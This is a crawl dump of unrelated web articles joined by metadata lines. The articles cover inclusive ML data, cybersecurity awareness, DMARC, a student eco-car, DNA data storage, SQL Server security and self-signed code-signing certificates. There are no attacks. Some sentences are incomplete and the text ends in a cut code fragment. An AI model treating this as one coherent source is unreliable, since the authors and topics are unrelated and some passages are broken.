Training data is the data that you feed to ML models to help them learn to make decisions. For instance, a model designed to categorize pictures of faces based on gender could be trained with a data set of images that are prelabeled based on gender identity. To be fair and unbiased, your training data should represent all possible users about whom your model may end up making decisions once it is deployed, rather than only a subset. A classic example of biased training data is a data set made up of pictures of faces of people from only one ethnic group. A model trained with data like this would likely not be able to interpret the faces of people of other demographics accurately, even if the model itself was not biased.

How to Get Started with Inclusive ML

Currently, there's no easy solution to inclusive machine learning. There are no tools that you can buy or download to ensure that your models and training data are fair. Instead, inclusive machine learning requires making a deliberate decision to prioritize fairness and accuracy when designing models and obtaining training data. You should also carefully evaluate the decisions that your ML models are making to identify instances of bias or unfairness. These practices require effort, but they deliver benefits in the form of happier users and a more effective business.

About the author: Christopher Tozzi is a technology analyst with subject matter expertise in cloud computing, application development, open source software, virtualization, containers and more. He also lectures at a major university in the Albany, New York, area. His book, "For Fun and Profit: A History of the Free and Open Source Software Revolution," was published by MIT Press.
<urn:uuid:2218307d-f301-4994-a089-7f58e74ae04f>
CC-MAIN-2022-40
https://www.itprotoday.com/cloud-computing-and-edge-computing/how-inclusive-machine-learning-can-benefit-your-organization
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335396.92/warc/CC-MAIN-20220929225326-20220930015326-00221.warc.gz
en
0.953445
1,035
3.609375
4
Cybersecurity awareness has never been more important than it is right now. Governments, businesses, and individuals are increasingly under attack by cybercriminals looking for profit or political gain. It seems like everywhere you look, malware attacks are on the rise, from cyberespionage attempts on mobile phones to ransomware attacks on businesses. The topic even received national attention in the first presidential debate, where Democratic nominee Hillary Clinton said, "I think cybersecurity will be one of the biggest challenges facing the next president." It's a challenge for government and industry, yes, but it's also a responsibility for each one of us to do our part. And that's why we're putting a spotlight on National Cybersecurity Awareness Month (NCSAM). NCSAM, observed every October, was created by the Department of Homeland Security and the National Cyber Security Alliance to ensure that every American has the resources they need to stay safer and more secure online. And here's how we'd like to help. Start building up your cyberknow-how by perusing our basic cybersecurity articles in the 101 category on Malwarebytes Labs. Next, you can level up to news about the latest in cybercrime, and, if you're already a cyberaficionado, then head on over to the threat analysis for a deep dive on malware intelligence. Here are a few of our favorite articles to start things off:
- How to tell if you're infected with malware
- 10 easy steps to clean your infected computer
- 10 easy ways to prevent malware infection
- Do I really need anti-malware for my Mac?
- Top 10 ways to secure your mobile phone
- Hacking your head: how cybercriminals use social engineering
Thanks, and happy (safe) surfing!
<urn:uuid:bbcd69ef-5f32-4119-94b4-f7d164304dab>
CC-MAIN-2022-40
https://www.malwarebytes.com/blog/news/2016/10/october-is-national-cybersecurity-awareness-month
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337338.11/warc/CC-MAIN-20221002150039-20221002180039-00221.warc.gz
en
0.945135
357
2.890625
3
What is DMARC? DMARC stands for Domain-based Message Authentication, Reporting, and Conformance. It was developed in 2012 to combat phishing emails and is designed to work on top of SPF and DKIM. A domain's DMARC policy is part of its DNS record. There are two parts to this protocol: reporting and conformance. The reporting component allows domain owners to monitor the authentication of emails (which is done by the ISPs). The conformance component allows domain owners to dictate how ISPs handle unauthenticated emails. It allows companies to control who can send email from their domains, and therefore prevent phishing on their domains. That's why every company needs DMARC. The DMARC policy can be set to one of three levels: "none," which monitors authentication but doesn't take any actions against unauthenticated messages; "quarantine," which is used as a 'soft block' of unauthenticated messages while SPF and DKIM policies are worked out; and "reject," which completely secures the domain once the SPF and DKIM policies are configured correctly and blocks all unauthenticated messages. These 3 levels allow companies to monitor and configure settings accurately so legitimate emails get delivered to inboxes and spoofed emails get blocked:
- None - allows monitoring only without interrupting the flow of email. It's the first step towards securing the domain. Emails can still be spoofed as the company identifies email sending services through DMARC reports. NOTE: this is distinct from having no policy, which means the domain does not use DMARC and cannot see when attackers spoof their domain.
- Quarantine - allows for a "soft block" on spoofed emails. It's the intermediate step that allows companies to double-check configurations. Spoofed emails go to the recipient's spam folder, and DMARC reports inform the company about it.
- Reject - allows companies to completely lock down their domains against spoofed emails. Spoofed emails are not delivered, and the company knows about the attempt through DMARC reports.
Here's an example of how it works: You send email from [email protected]. To use DMARC, you set your DMARC policy to "none," and the setting is hosted in your DNS record. That's all you have to do to get started with DMARC. Once you have a policy, you can start monitoring your email authentication through DMARC reports. As you begin to get a better idea of how your SPF and DKIM policies are working, you can increase your security to "quarantine," which tells ISPs to send unauthenticated email from your domain to spam. Once you're confident that your SPF and DKIM policies are working the way you want, you can set your DMARC policy to "reject." This tells ISPs not to deliver any unauthenticated emails from your domain. A reject policy is the most secure, but if it's put in place too quickly without first testing your settings, it could result in ISPs blocking your legitimate emails. There are some scenarios, like forwarded messages, in which the above process becomes more complicated. However, DMARC reports provide a record of how all emails sent from "you" were authenticated. These reports can be used to determine if SPF and DKIM are correctly implemented and identify when phishing emails are sent using your domain. DMARC reports provide actionable information that will help you properly secure your domain and protect your employees, your customers, and your reputation.
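To make the policy record itself concrete: a DMARC policy is published as a DNS TXT record at _dmarc.yourdomain.com. A minimal illustrative record (the domain and reporting address are placeholders, not values from this article) might look like:

v=DMARC1; p=none; rua=mailto:dmarc-reports@yourdomain.com

Here, v identifies the DMARC version, p sets the policy level ("none," "quarantine," or "reject"), and rua tells receiving mail servers where to send the aggregate DMARC reports described above.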
<urn:uuid:e63543a8-6264-4a58-87bc-5fe687acadf1>
CC-MAIN-2022-40
https://fraudmarc.com/post/about-dmarc
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337446.8/warc/CC-MAIN-20221003231906-20221004021906-00221.warc.gz
en
0.93799
755
2.96875
3
Students at Eindhoven University of Technology in the Netherlands have developed ZEM Zero Emission Mobility, a two-seat eco-friendly car with a Cleantron lithium-ion battery pack and 3D printing made of recycled plastic. The sporty all-electric car is similar to a BMW coupe, but unique in that it absorbs more carbon than it emits and produces almost no waste during production. The ultimate goal, according to Jens Lahaije, finance manager at TU/ecomotive, the car’s development team, is to ensure a greener future, and the goal is to minimize carbon dioxide emissions throughout the life of the car, from manufacture to recycling. ZEM, an electric car that purifies the air while driving, uses two filters that can capture up to 2 kilograms of CO2 over 20,000 miles, in line with the team’s vision of having filters that can be emptied at charging stations in the future. Students will take their vehicle, designed to be easily separated and recycled at the end of its use, on a promotional tour of the United States, visiting universities and businesses from the East Coast to Silicon Valley. The sources for this piece include an article in Reuters.
<urn:uuid:fa391971-6bd9-42a5-911e-426ce8e46b94>
CC-MAIN-2022-40
https://www.itworldcanada.com/post/dutch-university-students-invent-eco-friendly-car
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030333455.97/warc/CC-MAIN-20220924182740-20220924212740-00421.warc.gz
en
0.94835
254
2.59375
3
The world is made up of ones and zeros. Almost all aspects of our everyday lives have become digitized and turned into the universal language of computers. All businesses are going through this digital transformation whether they want to participate or not. Even entire government systems are turning completely paperless. Dubai is the first government to go completely paperless, but it almost certainly won’t be the last. The Emirate’s Crown Prince stated it would equate to a savings of $350 million and 14 million man-hours across the Dubai government. He also stated that this digital journey will allow and inspire its future governments to one day build a successful smart city. While all of the world’s data lives in the digital world, the space it requires occupies the real physical world as well. Some of the largest companies in the world also have the data centers to show for it. Google has 15 data centers, Amazon has 14 data centers, and Facebook has 12 data centers, which all add up to 15 million square feet of physical space. Additionally, there are 7.2 million data centers around the world taking up added space. There are several data storage technological advancements that could potentially change how the world stores data very shortly including nanotechnology and DNA data storage. Nanotechnology refers to the technology with measurements on the nanometer scale. These technologies include the handling and controlling of separate atoms and molecules. Nanotech is already being implemented to revolutionize technology in many different industries which include information technology, medicine, homeland security, energy, and environmental science. An example of the nanotech being implemented is with solar panels incorporating nanoparticles for a more lightweight and flexible solar cell. As nanotechnology is a general term, nanocomputing is a more specific term that refers to computing processes on the nanometer scale. It depicts the handling and processing of data with computers smaller than a micrometer. Specifically, a nanocomputing device is comprised of transistors that are less than 100 nanometers in length. One nanometer is one billionth of a meter. A nanometer is a unit of measurement that might be too theoretical to grasp, so we’ll use some everyday examples. A regular sheet of paper has a thickness of about 100,000 nanometers. A strand of human hair is about 75 microns, which is equivalent to 75,000 nanometers. In comparison, if the diameter of marble were equal to one nanometer, the diameter of the earth would be equivalent to one meter. Lastly, a strand of human DNA (deoxyribonucleic acid) is 2.5 nanometers in diameter. A nanocomputer uses nanotechnology with circuits and chips too small to be seen without a microscope. Nanocomputers work by storing the data on quantum dots. These nanocomputers are just like the computers we use every day, but with significantly smaller microchips. Current computer chips are made of semiconductors made of silicon. Nanocomputers have semiconductors that are under one hundred nanometers in length. The size of nanotechnology brings us to the developing concept of DNA storage. Nanotechnology will help bring in the era of a new type of storage. It’s estimated that 64.2 zettabytes of data was created, captured, copied, and consumed in 2020 and will rapidly grow to 180 zettabytes by 2025. To put this into perspective, one zettabyte is equivalent to one thousand exabytes, or one billion terabytes, or one trillion gigabytes. 
This is a lot of data that, as mentioned earlier, will require both digital and physical space. The growing need for data storage is pushing innovations in technology. Microsoft already has some of the technology needed for synthesizing, copying, and reading DNA for genetic sequencing, but to use DNA as a way to store data, more research and innovation still need to be done. Researchers are still working on manipulating spots and distances within strands to see the best way to store data. This includes applying a voltage that produces acid at the anode to enable the DNA chain to attach and release. Innovations are still being worked on. But there is a lot of potential in DNA storage. It is what holds all of the details of every living creature, and what makes every person different from the next. This means that tremendous amounts of data can be stored within the strands of DNA. Millions of digital files including photos, videos, and all documents could be stored on one small fragment of DNA. Innovations in data storage are vital because of how much data the world is currently creating. Again, it is estimated that the world will have produced 180 zettabytes of data by 2025. This data will require both digital and physical space. If the three largest companies are taking up 15 million square feet of space alone, there will certainly be a need for innovations in data storage. Some well-known drive manufacturers including Western Digital and Seagate are a part of a coalition of over 40 companies looking to further DNA storage. The DNA Data Storage Alliance also includes tape experts Spectra Logic and Quantum, as well as various bioscience organizations. All of these diverse companies coming together to assist in innovating the technology of DNA storage shows its importance. Although synthetic DNA storage isn’t quite ready to replace current storage systems, Microsoft’s latest developments and union of the DNA Data Storage Alliance points to a future that includes synthetic deoxyribonucleic acid data storage. As the world continues down this path of immense usage and even reliance on data—data storage will always be essential. Data storage solutions will continue to be vital, and innovations in these solutions will need to be modernized. Nanotechnology and nanocomputing will be significant technology that will contribute to bringing in a new era of data storage. DNA storage looks to be one of the more intriguing answers to future storage. Data centers will be important for years to come, and the evolution of data centers will be reliant on the technologies being developed today.
<urn:uuid:070d67b9-cf28-4cb2-aedc-df663bbb9526>
CC-MAIN-2022-40
https://www.colocationamerica.com/blog/nanotech-and-dna-storage-soon
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334644.42/warc/CC-MAIN-20220926020051-20220926050051-00421.warc.gz
en
0.940286
1,220
3.1875
3
MAID, or massive array of idle disks, has the potential to make disk-based storage the archive technology of choice in the future. The selling point of MAID is that it delivers performance in the hard-drive-array class when data is requested yet reduces the amount of energy wasted when archive data is in idle mode. The reduction in power consumption and heat that the MAID model provides puts disk almost in the energy-efficiency class of tape. MAID products are disk-based archives with unique capabilities that not only minimize power consumption but also prolong the lives of hard drives. The MAID concept has been around for a while, but there is currently only one company delivering live MAID solutions: Copan Systems. As utility costs and the demand for rapid data access continue to rise, MAID could become even more compelling for long-term storage archiving. At any given time, only about 25 percent of the disks in a MAID archive are active, with the other 75 percent in an idle state. A MAID system will consume about one-fourth to one-fifth the amount of power of a standard hard-drive-based archive, depending on how often data is accessed. MAID naysayers often bring up the issue of stiction (static friction) when explaining why MAID is not currently widely used. Stiction is defined as a hard drive failure that occurs when the heads of a hard drive do not lift when platters are spun up. Stiction most often occurs when a hard drive is activated after a long period of inactivity. Indeed, unlike tape, hard drives were not designed to sit idle for long periods of time. Copan therefore integrated automation programs in its MAID products that exercise the hard disks in an archive from time to time. Copan's appropriately named Disk Aerobics technology periodically spins up idle disks and runs consistency checks to ensure that the data residing on the drives is valid. Disk Aerobics is a novel concept, and it will likely help make sure stiction problems do not occur. However, MAID products are still in their infancy, so IT managers would be right to be somewhat doubtful about the expected life span of a MAID archive. Copan's MAID offerings, including the Revolution 220 family of products, use RAID 5 to ensure that data is protected, even if a drive happens to fail. eWEEK Labs assumes that RAID 6 could be implemented to provide dual parity, ensuring that data would not be lost even in the event that two drives in a given RAID set die simultaneously. When we spoke to Copan officials, however, they said they have no immediate plans to move to RAID 6 because their reliability record has been strong so far. Copan's first archive unit, released in August 2004, functioned as a VTL (virtual tape library), and the company has since added file-share-level access to its MAID archives. The smallest Copan system comes in at 28TB; priced at $3.75 per gigabyte, that makes it about $108,000.
<urn:uuid:bad498e5-93de-484e-a2a2-a5260517b430>
CC-MAIN-2022-40
https://www.eweek.com/storage/storage-maid-to-order/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334644.42/warc/CC-MAIN-20220926020051-20220926050051-00421.warc.gz
en
0.960179
624
2.984375
3
Evolution of Technologies To paraphrase science fiction author Arthur C. Clarke, those who make predictions about the future are either "considered conservative now and mocked later, or mocked now and proved right when they are no longer around to enjoy the acclaim." The one thing we can be sure about, Clarke ventured, is that "[the future] will be absolutely fantastic." This was in 1964, and in the decades that followed this statement Clarke was able to enjoy the excitement of technological evolution himself. But technology is constantly improving, the boundaries of human comprehension are constantly being stretched, and new technologies and advancements are being discovered at a greater rate than ever before. These don't always make headline news because they don't always have an immediate impact on our lives. The media is interested in the flying cars, hover boards and jetpacks of science fiction, and tends to shun everything else. But as this infographic (Infographic Courtesy of: Visual Capitalist) proves, every passing year brings with it a wealth of new discoveries, ones that even Arthur C. Clarke—a man who lived to see most of his predictions come to fruition and one who marveled at technology until the end—would have been impressed with. These are the building blocks of future technologies, the things that will soon have an impact on the way we shop, the way we eat and the way we heal. This is science fiction made science fact—it doesn't get more exciting than this. By David Jester Established in 2009, CloudTweaks is recognized as one of the leading authorities in cloud connected technology information, resources and thought leadership services. Contact us for ways on how to contribute and support our dedicated cloud community.
<urn:uuid:718c84ff-b645-4e38-ae7f-f2b21916c8be>
CC-MAIN-2022-40
https://cloudtweaks.com/2016/07/sci-fi-predictions-come-fruition/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335004.95/warc/CC-MAIN-20220927100008-20220927130008-00421.warc.gz
en
0.95567
357
2.515625
3
Why Do Data Analysts Use SQL? There are some major advantages to using traditional relational databases, which we interact with using SQL. The five most apparent are:
- SQL is easy to understand.
- Traditional databases allow us to access data directly.
- Traditional databases allow us to audit and replicate our data.
- SQL is a great tool for analyzing multiple tables at once.
- SQL allows you to analyze more complex questions than dashboard tools like Google Analytics.

SQL vs. NoSQL

You may have heard of NoSQL, which stands for not only SQL. Databases using NoSQL allow you to write code that interacts with the data a bit differently than what we will do in this course. These NoSQL environments tend to be particularly popular for web-based data, but less popular for data that lives in spreadsheets the way we have been analyzing data up to this point. One of the most popular NoSQL databases is MongoDB.

Why Businesses Like Databases

- Data integrity is ensured – only the data you want to be entered is entered, and only certain users are able to enter data into the database.
- Data can be accessed quickly – SQL allows you to obtain results very quickly from the data stored in a database. Code can be optimized to quickly pull results.
- Data is easily shared – multiple individuals can access data stored in a database, and the data is the same for all users allowing for consistent results for anyone with access to your database.

SQL Server Authentication and Authorization

Protecting data starts with the ability to authenticate users and authorize their access to specific data. To this end, SQL Server includes an authentication mechanism for verifying the identities of users trying to connect to a SQL Server instance, as well as an authorization mechanism that determines which data resources authorized users can access and what actions they can take. Authentication and authorization are achieved in SQL Server through a combination of security principals, securables, and permissions. Before I get into these, however, it's important to note that SQL Server supports two authentication modes: Windows Authentication, sometimes referred to as integrated security, and SQL Server and Windows Authentication, sometimes referred to as mixed mode. Windows authentication is integrated with Windows user and group accounts, making it possible to use a local or domain Windows account to log into SQL Server. When a Windows user connects to a SQL Server instance, the database engine validates the login credentials against the Windows principal token, eliminating the need for separate SQL Server credentials. Microsoft recommends that you use Windows Authentication whenever possible. In some cases, however, you might require SQL Server Authentication. For example, users might connect from non-trusted domains, or the server on which SQL Server is hosted is not part of a domain, in which case, you can use the login mechanisms built into SQL Server, without linking to Windows accounts. Under this scenario, the user supplies a username and password to connect to the SQL Server instance, bypassing Windows Authentication altogether. You can specify the authentication mode when setting up a SQL Server instance or change it after implementation through the server's properties, as shown in Figure 1.
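If you want to confirm which mode an existing instance is running, one quick way (a small T-SQL sketch, not from the original article) is:

SELECT SERVERPROPERTY('IsIntegratedSecurityOnly');

A result of 1 means the instance accepts Windows Authentication only; 0 means mixed mode is enabled.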
At the heart of the authentication and authorization mechanisms are the principals, securables, and permissions that must be configured to enable users to access the data they need, while preventing unauthorized users from accessing data they shouldn’t. You can view and work with principals, securables, and permissions through SQL Server Management Studio (SSMS), using either the built-in GUI tools or the available T-SQL statements. Figure 2 shows Object Explorer in SSMS with the expanded Security folder for the WideWorldImporters database and, below that, the expanded Security folder for the SQL Server instance. Principals are individuals, groups, or processes that are granted access to the SQL Server instance, either at the server level or database level. Server-level principals include logins and server roles, which are listed in the Logins and Server Roles subfolders in the Security folder: - A login is an individual user account for logging into the SQL Server instance. A login can be a local or domain Windows account or a SQL Server account. You can assign server-level permissions to a login, such as granting a user the ability to create databases or logins. - A server role is a group of users that share a common set of server-level permissions. SQL Server supports fixed server roles and user-defined server roles. You can assign logins to a fixed server role, but you cannot change its permissions. You can do both with a user-defined server role. Database-level principals include users and database roles, which are listed in the Users and Roles subfolders in the database’s Security folder: - A database user is an individual user account for logging into a specific database. The database user commonly maps to a corresponding server login in order to provide access to the SQL Server instance as well as the data itself. However, you can create database users that are independent of any logins, which can be useful for developing and testing data-driven applications, as well as for implementing contained databases. - A database role is a group of users that share a common set of database-level permissions. As with server roles, SQL Server supports both fixed and user-defined database roles. For each security principal, you can grant rights that allow that principal to access or modify a set of securables. Securables are the objects that make up the database and server environment. They can include anything from functions to database users to endpoints. SQL Server scopes the objects hierarchically at the server, database and schema levels: - Server-level securables include databases as well as objects such as logins, server roles, and availability groups. - Database-level securables include schemas as well as objects such as database users, database roles, and full-text catalogs. - Schema-level securables include objects such as tables, views, functions, and stored procedures. Permissions define the level of access permitted to principals on specific securables. You can grant or deny permissions to securables at the server, database, or schema level. The permissions you grant at a higher level of the hierarchy can also apply to the children objects, unless you specifically override the permissions at the lower level. For example, if you grant the SELECT permission to the user1 principal on the Sales schema in the WideWorldImporters database, the user will be able to query all table data in that schema. 
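A minimal T-SQL sketch of this scenario (it assumes a database user named user1 already exists, matching the example above):

-- Allow user1 to read every table in the Sales schema
GRANT SELECT ON SCHEMA::Sales TO user1;
-- Override that grant for one specific table
DENY SELECT ON OBJECT::Sales.Customers TO user1;

The effect of the second statement is described next.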
However, if you then deny the SELECT permission on the Sales.Customers table, the user will not be able to query that table, but will still be able to access the other tables in that schema. You can use SSMS or T-SQL to view the permissions that have been explicitly granted to a user on a securable. For example, Figure 3 shows the permissions granted to the user2 principal on the Sales.Customers table. In this case, the user has been granted the UPDATE permission, with no permissions explicitly denied. Configuring permissions for multiple principals on multiple securables can be a complex and sometimes frustrating process. If you don't get it right, you could end up denying permissions to users who should have access to specific data or, worse still, granting access to users who should not. The safest bet is to follow the principle of least privilege, working at the most granular level practical for a given situation.

Additional Access Control Features

SQL Server also provides several other features for controlling access to data. For example, you can implement row-level security on a specific table by creating a security policy that calls one or more predicates. A security policy defines the structure necessary to apply row-level security to a table. A predicate is a table-valued function that provides the logic necessary to determine which rows the security policy applies to. A security policy supports two types of predicates: filter and block. A filter predicate filters the rows available to read operations, and a block predicate blocks write operations that violate the predicate. You can include both filter and block predicates within a security policy, and you can call the same or different predicate functions within that policy. For example, the WideWorldImporters database includes the FilterCustomersBySalesTerritoryRole security policy, which defines both a filter predicate and block predicate. Figure 4 shows the security policy as it is listed in Object Explorer, along with the policy definition. In this case, both the filter predicate and block predicate call the DetermineCustomerAccess function, which determines which rows the current user can access. Another SQL Server security feature is the application role, which is similar to the database role, except that it is used specifically to assign permissions to an application. However, unlike database roles, application roles do not contain members. In addition, they're invoked only when an application connects to SQL Server and calls the sp_setapprole system stored procedure, passing in the name of the application role and password. SQL Server enforces the permissions granted to the application role for the duration of the connection. Another access mechanism that SQL Server provides is the credential, a server-level object (record) that contains authentication information such as a username and password. The credential makes it possible for a SQL Server user to connect to a resource outside of the SQL Server environment. For example, you can use a credential to run an external assembly or to access domain resources if you've logged in using SQL Server Authentication.
Encryption is not an access-control mechanism, that is, it does not prevent unauthorized users from accessing data. However, encryption can limit the exposure of sensitive data should unauthorized users manage to break through SQL Server’s access-control defenses. For example, if cybercriminals acquire encrypted credit card information from a database, they will not be able to make sense of that data unless they’ve also figured out a way to decrypt it. SQL Server supports several approaches to encryption to accommodate different types of data and workloads. For example, you can encrypt data at the column level by taking advantage of SQL Server’s built-in encryption hierarchy and key management infrastructure. Under this model, each layer encrypts the layer below it, using a layered architecture made up of a public key certificate and several symmetric keys. In this way, the column data is always protected until it is specifically decrypted. Another tool available to SQL Server is Transparent Data Encryption (TDE), which encrypts and decrypts both data and log files in real-time, working at the page level to ensure that data at-rest is protected. The database engine encrypts the pages before writing them to disk and decrypts them when reading the pages into memory. Unlike column-level encryption, an application does not have to take specific steps to decrypt the data. The entire process occurs behind the scenes. SQL Server also supports the Always Encrypted feature, which makes it possible for a client application to handle the actual encryption operations, without the encryption keys being revealed to the database engine. However, to implement Always Encrypted, you must first generate the column encryption keys necessary to support Always Encrypted. To do so, you can use the Always Encrypted wizard in SSMS, as shown in Figure 5. Once the columns have been encrypted, the data is ready for client access. However, for a client application to connect to encrypted data, it must incorporate a driver that is enabled for Always Encrypted and can handle the encryption and decryption operations. Another useful SQL Server security feature is Dynamic Data Masking (DDM), a tool for masking all or part of data values. Although DDM doesn’t actually encrypt the data, it does limit the amount of exposed data to non-authorized users. For example, you can use DDM to mask all but the last four digits of a credit card number or national identifier such as a social security number. SQL Server Tools SQL Server includes a number of other tools to help protect data and limit risks. For example, you can use SQL Server Configuration Manager to configure startup or connection options, or use the sp_configure stored procedure to configure global SQL Server settings. SQL Server also provides the Surface Area Configuration facets for enabling or disabling features at the instance level, as shown in Figure 6. You can use these tools to ensure that only those features essential to supporting your users and applications are enabled at any given time, helping to reduce the exposed surface area and consequently the level of risk. SQL Server also provides tools for identifying potential database issues. For instance, SQL Server provides the TRUSTWORTHY property as one of its database properties. The property shows whether the current SQL Server instance can trust the database and its contents. 
In addition, SSMS provides the Data Discovery & Classification feature for classifying, labeling, and reporting on potentially sensitive data in a database, as well as the SQL Vulnerability Assessment (SVA) tool for discovering, tracking, and addressing potential database vulnerabilities. Figure 7 shows the results of running an SVA assessment against the WideWorldImporters database in SQL Server 2017. One of the most valuable SQL Server security tools is SQL Server Audit, which provides a structure for tracking and logging events that occur within the database engine. With SQL Server Audit, you can monitor events at the server level, database level, or both. SQL Server Audit comprises three primary component types. The first is the audit object, which provides a structure for carrying out the auditing process. The audit object defines a target for the audited events. The target can be log files, the Application log, or the Security log. The audit object also includes configuration settings such as the number and size of the log files. In addition to the audit object, an audit usually includes a server audit specification, a database audit specification for each applicable database, or a combination of any of these. The specifications determine which events should be audited at the server level or database level. For example, Figure 8 shows a database audit specification that audits DELETE events on the In this case, both events are specific to the user1 database user. If the user tries to update or delete data in the Customers table, SQL Server Audit will log the event to the target repository. Along with all these tools, SQL Server also provides a number of catalog views and dynamic management views for accessing security-related data. For example, you can retrieve details about the permissions granted and denied to a specific database user. Protecting a SQL Server instance In addition to taking steps within SQL Server to protect data, DBAs should also be certain to implement protections related to the SQL Server instance as a whole, such as disabling unused SQL Server components, applying security patches and service packs in a timely manner, and ensuring that database and backup files are fully protected and secure at all times. But a protection strategy should not be limited only to SQL Server. The host operating system should also be kept up-to-date and properly patched, with just as much attention paid to surface area reduction. In addition, DBAs and IT administrators must ensure that the host server is physically protected and that network safeguards such as firewalls and intrusion detection are in place. A SQL Server instance must be both physically and logically protected to achieve the maximum security. Development teams must also ensure that the applications connecting to a SQL Server instance are properly vetted for security issues. A data-driven application is at risk for a number of attacks, including connection string injections, elevation of privileges, and SQL injections. The teams should factor in data security from the start, when first designing the application, not after it’s been implemented. Securing SQL Server SQL Server security is a huge topic, and what I’ve covered here barely skims that surface. You should view this article as only a starting point, meant to alert you to the many security considerations to take into account and the different SQL Server tools available for protecting data. 
As this series progresses, I’ll dig deeper into the various security components, fleshing out what I’ve covered here and introducing you to concepts I’ve yet to explore. In the meantime, I recommend you learn as much about SQL Server security as possible, beginning with Microsoft’s own documentation.
<urn:uuid:0eab2e7d-58c9-4612-b80e-cc2271be6455>
CC-MAIN-2022-40
https://cybercoastal.com/cybersecurity-tutorial-for-beginners-why-sql-is-important/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335424.32/warc/CC-MAIN-20220930020521-20220930050521-00421.warc.gz
en
0.89129
3,482
3.21875
3
How to Generate a Self Signed Code Signing Certificate (And Why You Shouldn't)

While it's possible to generate and use a self signed code signing certificate, this is a practice you should avoid doing for uses outside your organization's internal testing environment.

Technically speaking, it's possible to use self signed code signing certificates. However, doing so in public-facing applications means that the certificate won't work for its intended purpose, which is to prove the legitimacy of your software. Nowadays, malware attacks are common. Publicly trusted code signing certificates play an essential role in helping users know whether the software applications they download or install come from trusted sources. When these certificates are issued by trusted third parties known as certificate authorities (CAs), they contain verified organization information to let users know whether a legitimate entity published it. However, a program that isn't signed by one of these digital certificates — such as a self signed certificate that the software's creator generates — will prompt operating systems and browsers to warn users that the executable is from an unverified or unknown publisher. But what is a self signed code signing certificate? How do you create one? And why is it a good idea to only use publicly trusted code signing certificates?

What's a Self-Signed Code Signing Certificate?

Unlike publicly trusted code signing certificates, which come from third-party certificate authorities (CAs) like Sectigo, DigiCert or Comodo, self signed code signing certificates are developed and issued by the software developers who use them. Self signed certificates have their own policies defined by software developers. Therefore, they're not universally accepted or recognized by operating systems or major web browsers like Google Chrome or Mozilla Firefox. In other words, self signed code signing certificates are the code signing certificates signed and vouched for by you and not by any third party globally trusted certificate authority. The main issue of having a self signed code signing certificate is that browsers and machines will not have your public key within their trust store as you aren't popular or a well-known CA, and consequently, they may not have a reason to trust you. But let's say you still want to create self signed certificates for use within your organization's internal environment. How would you go about doing so?

How to Generate a Self Signed Code Signing Certificate

One way to generate a self signed code signing certificate is to use a tool such as OpenSSL or PowerShell. You have a few options as to how to go about doing this, such as using Linux or PowerShell. In this case, we'll use PowerShell's New-SelfSignedCertificate cmdlet, which allows you to create different types of certificates for different purposes. Note: you'll need to have administrator access. Use the following command to generate a self signed code signing certificate using this PowerShell script:

$cert = New-SelfSignedCertificate -DNSName "www.yourdomain.com" -CertStoreLocation Cert:\CurrentUser\My -Type CodeSigningCert -Subject "Example of Your Code Signing Certificate"

A screenshot of what this type of command script looks like in PowerShell. Likewise, you can also add your generated self signed certificate as a trusted certificate authority for the network by using Microsoft Management Console (type mmc.exe in RUN to open).
And, after that, you'll need to copy your generated self signed code signing certificate from the Personal folder and paste it into the folder named Certificates which is under the Trusted Root Certificate Authority. Here's what it looks like while stored in the Personal folder: A screenshot of a code signing certificate that's attached to a user's account. However, it's important to note that self signed code signing certificates can be misused. For this reason, as a software developer, you should only sign your executables using publicly trusted certificates.

Here's How It Could Go Wrong If You Use a Self Signed Code Signing Certificate

Although a self signed certificate is acceptable for internal purposes (such as testing), it'll generate issues and warning messages if you try to use it to sign software, scripts or other executables that you publish online. For instance, your users will start receiving different warning messages (like the one below) whenever they try downloading or installing the software: A screenshot of the "Unknown" publisher warning that users see when they try to install an executable that's not signed using a code signing certificate. No one wants to see the word "unknown" associated with the publisher. Users want to know that the software is from a verified developer or publisher that they can trust. Of course, if you want to get rid of these types of Windows Defender SmartScreen warnings altogether, you'd need to sign your code using an extended validation code signing certificate.

Not Signing Your Code Makes Your Software Look Dangerous

Whether you use a self signed code signing certificate or don't sign your software or code at all, the results will be similar. When someone tries to download your software through a web browser like Google Chrome or Mozilla Firefox, it will verify that a trusted source hasn't issued the code signing certificate. Because of that, it'll issue a browser warning message to the user. Such warning messages will make it appear like your software is malicious, and your users will most likely not be bothered to click and download it. As a result, your conversion will fail, and the user will leave your site.

What About Free Code Signing Certificates — Are They Available?

No, free publicly trusted code signing certificates aren't something you can get. You must purchase them from third-party certificate authorities — like some of the ones we mentioned earlier (Sectigo and DigiCert). If you're wondering why there's a cost associated with these certificates, the answer is simple: code signing certificates aren't free because they require CAs to go through a verification process before issuing them. CAs vouch for the organization's or any individual software developer's integrity, which is time-consuming and cannot be done free of cost. However, it doesn't mean that you'll be required to pay a hefty amount. Code signing certificates from respected CAs will fit in the budget of any organization or individual. We are sure you can afford it and get your code signed without breaking the bank.

Buying a Code Signing Certificate From a Respected CA Is the Solution

Code signing certificates aren't as costly as you may think. For instance, a Comodo code signing certificate is offered for as low as $69 per year if you choose to go for a valid certificate for three years. Furthermore, you can also avail yourself of additional discounts by applying coupon codes on the very same product.
Our Final Verdict on Using Self Signed Code Signing Certificates (Don’t In Most Cases)
As mentioned above, self signed certificates are useful in certain scenarios, such as testing. In other words, you can use one to make your executables appear trusted on a particular target machine by deploying the certificate to the Windows certificate store before installing the software. But if you’re looking to sign software that other people will download onto computers you don’t control, you must avoid self signed certificates. In such cases, they are completely useless. Unlike code signing certificates from public CAs, which require their users to go through a vetting process, a self signed code signing certificate doesn’t involve any such process. That’s why it’s not recognized or trusted by browsers and operating systems. All of this is to say that self signed code signing certificates aren’t going to do you any good if you’re looking to sign executables and software that you distribute to customers. Therefore, it’s wise to avoid using a self signed certificate in most cases. However, if you do want to use these digital certificates, you need to ensure that their usage remains limited to testing purposes within your internal environments only.
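As a rough illustration of what “self signed” means at the certificate level, the short sketch below checks whether a certificate’s issuer and subject name are the same entity, which is the defining trait of a self signed certificate. This is not part of the original article: it assumes a recent version of the third-party Python “cryptography” package is installed, and the file name is a placeholder.

from cryptography import x509

def is_self_signed(pem_path):
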